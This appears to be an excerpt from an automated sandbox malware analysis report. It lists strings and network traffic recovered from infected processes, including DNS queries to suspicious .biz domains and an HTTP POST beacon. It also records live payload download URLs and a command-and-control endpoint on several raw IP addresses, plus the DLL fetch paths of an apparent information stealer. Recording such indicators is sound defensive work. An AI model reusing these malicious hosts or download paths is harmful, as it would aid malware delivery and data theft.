                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: webcompat-reporter%40mozilla.org:1.5.1@mozilla.org/addons/addon-manager-startup;1*://cdn.branch.io/branch-latest.min.js*resource://gre/modules/addons/XPIProvider.jsm*://auth.9c9media.ca/auth/main.jswebcompat-reporter@mozilla.org.xpi*://track.adform.net/serving/scripts/trackpoint/@mozilla.org/network/atomic-file-output-stream;1@mozilla.org/network/file-output-stream;1FileUtils_openAtomicFileOutputStreamFileUtils_closeSafeFileOutputStream*://static.chartbeat.com/js/chartbeat_video.js*://pub.doubleverify.com/signals/pub.js**://web-assets.toggl.com/app/assets/scripts/*.jspictureinpicture%40mozilla.org:1.0.0*://www.rva311.com/static/js/main.*.chunk.jshttps://smartblock.firefox.etp/facebook.svghttps://smartblock.firefox.etp/play.svg*://libs.coremetrics.com/eluminate.js*://connect.facebook.net/*/all.js**://imasdk.googleapis.com/js/sdkloader/ima3.js*://adservex.media.net/videoAds.js**://pagead2.googlesyndication.com/tag/js/gpt.js**://*.moatads.com/*/moatheader.js**://s0.2mdn.net/instream/html5/ima3.js*://www.google-analytics.com/gtm/js**://www.googletagmanager.com/gtm.js**://www.googletagservices.com/tag/js/gpt.js**://static.adsafeprotected.com/iasPET.1.js*://cdn.optimizely.com/public/*.js*://ssl.google-analytics.com/ga.js*://*.vidible.tv/*/vidible-min.js**://www.google-analytics.com/plugins/ua/ec.js*://s.webtrends.com/js/advancedLinkTracking.js*://js.maxmind.com/js/apis/geoip2/*/geoip2.js*://cdn.adsafeprotected.com/iasPET.1.js*://s.webtrends.com/js/webtrends.js*://www.google-analytics.com/analytics.js**://s.webtrends.com/js/webtrends.min.jsresource://gre/modules/DeferredTask.sys.mjs equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000002F.00000002.3532560514.000001F944897000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3530700311.000001F9445DC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3532560514.000001F944807000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000002F.00000002.3760375687.000016C370E00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000002F.00000002.3530700311.000001F944581000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3530700311.000001F9445E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3532560514.000001F944835000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: x*://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
                          Source: global trafficDNS traffic detected: DNS query: www.google.com
                          Source: global trafficDNS traffic detected: DNS query: ogs.google.com
                          Source: global trafficDNS traffic detected: DNS query: apis.google.com
                          Source: global trafficDNS traffic detected: DNS query: play.google.com
                          Source: global trafficDNS traffic detected: DNS query: dare-curbys.biz
                          Source: global trafficDNS traffic detected: DNS query: atten-supporse.biz
                          Source: global trafficDNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
                          Source: global trafficDNS traffic detected: DNS query: detectportal.firefox.com
                          Source: global trafficDNS traffic detected: DNS query: youtube.com
                          Source: global trafficDNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
                          Source: global trafficDNS traffic detected: DNS query: contile.services.mozilla.com
                          Source: global trafficDNS traffic detected: DNS query: spocs.getpocket.com
                          Source: global trafficDNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
                          Source: global trafficDNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
                          Source: global trafficDNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
                          Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: dare-curbys.biz
                          Source: firefox.exe, 0000002F.00000002.3437343071.000001F93286B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3487529007.000001F943DA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3487529007.000001F943DB9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3443955333.000001F93EAB0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: http://127.0.0.1:
                          Source: skotes.exe, 00000016.00000002.3432522788.00000000010AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/luma/random.exe
                          Source: skotes.exe, 00000016.00000002.3432522788.00000000010AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/luma/random.exeh
                          Source: skotes.exe, 00000016.00000002.3432522788.00000000010AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/luma/random.exey
                          Source: file.exe, 00000000.00000002.2729388458.000000000155E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/mine/random.exe
                          Source: file.exe, 00000000.00000002.2729388458.00000000015B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/mine/random.exe3w
                          Source: file.exe, 00000000.00000002.2729388458.00000000015B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/mine/random.exegwUo
                          Source: skotes.exe, 00000016.00000002.3432522788.00000000010AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/random.exe
                          Source: skotes.exe, 00000016.00000002.3432522788.00000000010AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exe
                          Source: skotes.exe, 00000016.00000002.3432522788.00000000010AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exeH
                          Source: skotes.exe, 00000016.00000002.3432522788.00000000010AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/well/random.exe
                          Source: skotes.exe, 00000016.00000002.3432522788.00000000010AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/well/random.exel
                          Source: file.exe, 00000000.00000002.2729388458.000000000155E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2727922118.0000000000B24000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2727922118.0000000000C07000.00000040.00000001.01000000.00000003.sdmp, 6ae2430bb1.exe, 0000001C.00000002.3262194656.000000000140E000.00000004.00000020.00020000.00000000.sdmp, 6ae2430bb1.exe, 0000001C.00000002.3262194656.0000000001483000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
                          Source: file.exe, 00000000.00000002.2729388458.00000000015B8000.00000004.00000020.00020000.00000000.sdmp, 6ae2430bb1.exe, 0000001C.00000002.3262194656.0000000001489000.00000004.00000020.00020000.00000000.sdmp, 6ae2430bb1.exe, 0000001C.00000002.3262194656.0000000001470000.00000004.00000020.00020000.00000000.sdmp, 6ae2430bb1.exe, 0000001C.00000002.3262194656.0000000001483000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
                          Source: 6ae2430bb1.exe, 0000001C.00000002.3262194656.0000000001483000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/$
                          Source: 6ae2430bb1.exe, 0000001C.00000002.3262194656.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/405117-2476756634-1003
                          Source: file.exe, 00000000.00000002.2729388458.00000000015D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dll
                          Source: file.exe, 00000000.00000002.2729388458.00000000015D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dllv
                          Source: file.exe, 00000000.00000002.2729388458.00000000015D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dll
                          Source: file.exe, 00000000.00000002.2729388458.00000000015B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll
                          Source: file.exe, 00000000.00000002.2729388458.00000000015D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dll
                          Source: file.exe, 00000000.00000002.2729388458.00000000015B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dll
                          Source: file.exe, 00000000.00000002.2729388458.00000000015B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dllm
                          Source: file.exe, 00000000.00000002.2729388458.00000000015D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dll
                          Source: file.exe, 00000000.00000002.2729388458.00000000015B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dll%L
                          Source: file.exe, 00000000.00000002.2729388458.00000000015B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dllesYo
                          Source: 6ae2430bb1.exe, 0000001C.00000002.3262194656.0000000001470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/B
                          Source: 6ae2430bb1.exe, 0000001C.00000002.3262194656.0000000001483000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/Q
                          Source: 6ae2430bb1.exe, 0000001C.00000002.3262194656.0000000001483000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
                          Source: file.exe, 00000000.00000002.2729388458.000000000155E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
                          Source: file.exe, 00000000.00000002.2729388458.00000000015D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php9R
                          Source: file.exe, 00000000.00000002.2729388458.00000000015D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpES
                          Source: 6ae2430bb1.exe, 0000001C.00000002.3262194656.0000000001468000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpQ
                          Source: 6ae2430bb1.exe, 0000001C.00000002.3262194656.000000000140E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpZ
                          Source: 6ae2430bb1.exe, 0000001C.00000002.3262194656.0000000001483000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php_
                          Source: file.exe, 00000000.00000002.2727922118.0000000000B24000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpation
                          Source: file.exe, 00000000.00000002.2727922118.0000000000C07000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpb03cdf9128c01bfdc9a9a24d7875lt-release
                          Source: 6ae2430bb1.exe, 0000001C.00000002.3262194656.0000000001468000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpe
                          Source: file.exe, 00000000.00000002.2729388458.000000000155E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpfi
                          Source: file.exe, 00000000.00000002.2727922118.0000000000B24000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpge
                          Source: file.exe, 00000000.00000002.2729388458.00000000015D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpj
                          Source: file.exe, 00000000.00000002.2729388458.00000000015D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpuS
                          Source: file.exe, 00000000.00000002.2729388458.00000000015B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/ul
                          Source: file.exe, 00000000.00000002.2727922118.0000000000C07000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.206CBAoaming
                          Source: 6ae2430bb1.exe, 0000001C.00000002.3262194656.000000000140E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206W
                          Source: file.exe, 00000000.00000002.2727922118.0000000000B24000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.206ta
                          Source: skotes.exe, 00000016.00000002.3432522788.0000000001077000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
                          Source: skotes.exe, 00000016.00000002.3432522788.0000000001077000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php1W?
                          Source: skotes.exe, 00000016.00000002.3432522788.00000000010AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpA
                          Source: skotes.exe, 00000016.00000002.3432522788.00000000010DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpUsers
                          Source: skotes.exe, 00000016.00000002.3432522788.00000000010AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpY
                          Source: skotes.exe, 00000016.00000002.3432522788.00000000010AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/
                          Source: skotes.exe, 00000016.00000002.3432522788.00000000010AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/1.244.11/files/martin/random.exe
                          Source: skotes.exe, 00000016.00000002.3432522788.00000000010AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/martin/random.exe
                          Source: skotes.exe, 00000016.00000002.3432522788.00000000010AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/martin/random.exe001
                          Source: skotes.exe, 00000016.00000002.3432522788.00000000010AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/martin/random.exe001J
                          Source: skotes.exe, 00000016.00000002.3432522788.00000000010AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/martin/random.exe001f
                          Source: skotes.exe, 00000016.00000002.3432522788.00000000010AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/martin/random.exe5
                          Source: skotes.exe, 00000016.00000002.3432522788.00000000010AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/martin/random.exe76
                          Source: skotes.exe, 00000016.00000002.3432522788.00000000010AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/martin/random.exe760E
                          Source: skotes.exe, 00000016.00000002.3432522788.000000000101E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/martin/random.exeAppData
                          Source: skotes.exe, 00000016.00000002.3432522788.00000000010AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/martin/random.exed7
                          Source: skotes.exe, 00000016.00000002.3432522788.00000000010AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/martin/random.exend)
                          Source: skotes.exe, 00000016.00000002.3432522788.0000000001077000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000016.00000002.3432522788.0000000001051000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/rhnew.exe
                          Source: skotes.exe, 00000016.00000002.3432522788.0000000001051000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/rhnew.exe(
                          Source: skotes.exe, 00000016.00000002.3432522788.0000000001077000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/rhnew.exe85062384760
                          Source: skotes.exe, 00000016.00000002.3432522788.0000000001077000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/rhnew.exeV
                          Source: skotes.exe, 00000016.00000002.3432522788.00000000010AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/unique2/random.exe
                          Source: skotes.exe, 00000016.00000002.3432522788.00000000010AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/unique2/random.exek
                          Source: skotes.exe, 00000016.00000002.3432522788.00000000010AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/iles/martin/random.exe
                          Source: e6d73861f4.exe, 0000001A.00000002.3439588929.00000000055D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.63.197.221
                          Source: e6d73861f4.exe, 0000001A.00000002.3429327881.0000000000EDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.63.197.221/add?substr=mixtwo&s=three&sub=
                          Source: e6d73861f4.exe, 0000001A.00000002.3429327881.0000000000EDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.63.197.221/add?substr=mixtwo&s=three&sub=#d
                          Source: e6d73861f4.exe, 0000001A.00000002.3439588929.00000000055E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.63.197.221/add?substr=mixtwo&s=three&sub=3v
                          Source: e6d73861f4.exe, 0000001A.00000002.3429327881.0000000000E57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.63.197.221/dll/download
                          Source: e6d73861f4.exe, 0000001A.00000002.3429327881.0000000000EFA000.00000004.00000020.00020000.00000000.sdmp, e6d73861f4.exe, 0000001A.00000002.3439588929.00000000055D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.63.197.221/dll/key
                          Source: e6d73861f4.exe, 0000001A.00000002.3439588929.00000000055D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.63.197.221/dll/keyP
                          Source: e6d73861f4.exe, 0000001A.00000002.3429327881.0000000000EFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.63.197.221/dll/keyhqos.dll.mui
                          Source: e6d73861f4.exe, 0000001A.00000002.3429327881.0000000000EFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.63.197.221/dll/keyystem32
                          Source: e6d73861f4.exe, 0000001A.00000002.3429327881.0000000000E57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.63.197.221/files/download
                          Source: e6d73861f4.exe, 0000001A.00000002.3439588929.00000000055D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.63.197.221/files/download21/files/download
                          Source: e6d73861f4.exe, 0000001A.00000002.3429327881.0000000000E57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.63.197.221/files/downloadB
                          Source: e6d73861f4.exe, 0000001A.00000002.3429327881.0000000000E57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.63.197.221/files/downloadH
                          Source: e6d73861f4.exe, 0000001A.00000002.3439588929.00000000055D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.63.197.221/files/downloadMicrosoft
                          Source: e6d73861f4.exe, 0000001A.00000002.3429327881.0000000000E57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.63.197.221/files/downloadV
                          Source: e6d73861f4.exe, 0000001A.00000002.3439588929.00000000055D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.63.197.221/files/downloadeer
                          Source: e6d73861f4.exe, 0000001A.00000002.3429327881.0000000000E57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.63.197.221/files/downloadm
                          Source: e6d73861f4.exe, 0000001A.00000002.3429327881.0000000000E57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.63.197.221/files/downloadn
                          Source: e6d73861f4.exe, 0000001A.00000002.3439588929.00000000055D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.63.197.221/files/downloadt
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3689565654.000001F94B46B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a9.com/-/spec/opensearch/1.0/
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3689565654.000001F94B46B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a9.com/-/spec/opensearch/1.1/
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3689565654.000001F94B46B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.0/
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3689565654.000001F94B46B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.1/
                          Source: fc1511c233.exe, 0000001B.00000003.3315367443.0000000005B45000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3530700311.000001F944538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                          Source: fc1511c233.exe, 0000001B.00000003.3315367443.0000000005B45000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3530700311.000001F944538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%sgecko.handlerService.defaultHandlersVersion
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%sgecko.handlerService.defaultHandlersVersionhttps://m
                          Source: rhnew.exe, 00000019.00000003.2971473959.0000000001387000.00000004.00000020.00020000.00000000.sdmp, rhnew.exe, 00000019.00000003.2971218158.000000000132F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro(
                          Source: fc1511c233.exe, 0000001B.00000003.3315367443.0000000005B45000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3530700311.000001F944538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                          Source: fc1511c233.exe, 0000001B.00000003.3315367443.0000000005B45000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3530700311.000001F944538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                          Source: fc1511c233.exe, 0000001B.00000003.3315367443.0000000005B45000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3530700311.000001F944538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                          Source: fc1511c233.exe, 0000001B.00000003.3315367443.0000000005B45000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3530700311.000001F944538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                          Source: fc1511c233.exe, 0000001B.00000003.3315367443.0000000005B45000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3530700311.000001F944538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                          Source: firefox.exe, 0000002F.00000002.3502039099.000001F944259000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com
                          Source: firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3443955333.000001F93EAB0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com/canonical.html
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com/canonical.htmlresetPrincipalToInheritToNullPrincipalLOAD_MEDIA_SNIFF
                          Source: firefox.exe, 0000002F.00000002.3551249065.000001F944A03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListener
                          Source: firefox.exe, 0000002F.00000002.3460822132.000001F943280000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListenerFailed
                          Source: firefox.exe, 0000002F.00000002.3664339405.000001F94B04C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListenerUseOfReleaseEventsWarningUse
                          Source: firefox.exe, 0000002F.00000002.3551249065.000001F944A03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3664339405.000001F94B04C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListener
                          Source: firefox.exe, 0000002F.00000002.3460822132.000001F943280000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListenerThe
                          Source: firefox.exe, 0000002F.00000002.3442280011.000001F93E08C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://exslt.org/common
                          Source: firefox.exe, 0000002F.00000002.3442280011.000001F93E061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://exslt.org/dates-and-times
                          Source: firefox.exe, 0000002F.00000002.3442280011.000001F93E08C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://exslt.org/math
                          Source: firefox.exe, 0000002F.00000002.3442280011.000001F93E061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://exslt.org/regular-expressions
                          Source: firefox.exe, 0000002F.00000002.3442280011.000001F93E08C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://exslt.org/sets
                          Source: firefox.exe, 0000002F.00000002.3437343071.000001F932803000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://exslt.org/stringsP
                          Source: firefox.exe, 0000002F.00000002.3446314030.000001F93F000000.00000002.00000001.00040000.00000017.sdmpString found in binary or memory: http://fb.me/use-check-prop-types
                          Source: firefox.exe, 0000002F.00000002.3446314030.000001F93F000000.00000002.00000001.00040000.00000017.sdmpString found in binary or memory: http://fb.me/use-check-prop-typesG
                          Source: firefox.exe, 0000002F.00000002.3689565654.000001F94B461000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3453979007.000001F942703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3721579323.000001F94D14B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3457437110.000001F942CC3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3616491974.000001F94639D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3394344261.000001F9434CA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3393617956.000001F9433F6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3504039978.000001F944368000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3616491974.000001F9463B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3392279109.000001F9434EF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3458520897.000001F942DC8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3584635396.000001F945E2E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3457437110.000001F942C6B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3551249065.000001F944A64000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3413609052.000001F944259000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3461899011.000001F9433F6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3393214051.000001F9434E7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3504039978.000001F944315000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3392411243.000001F9434CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3464541516.000001F9436F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/MPL/2.0/.
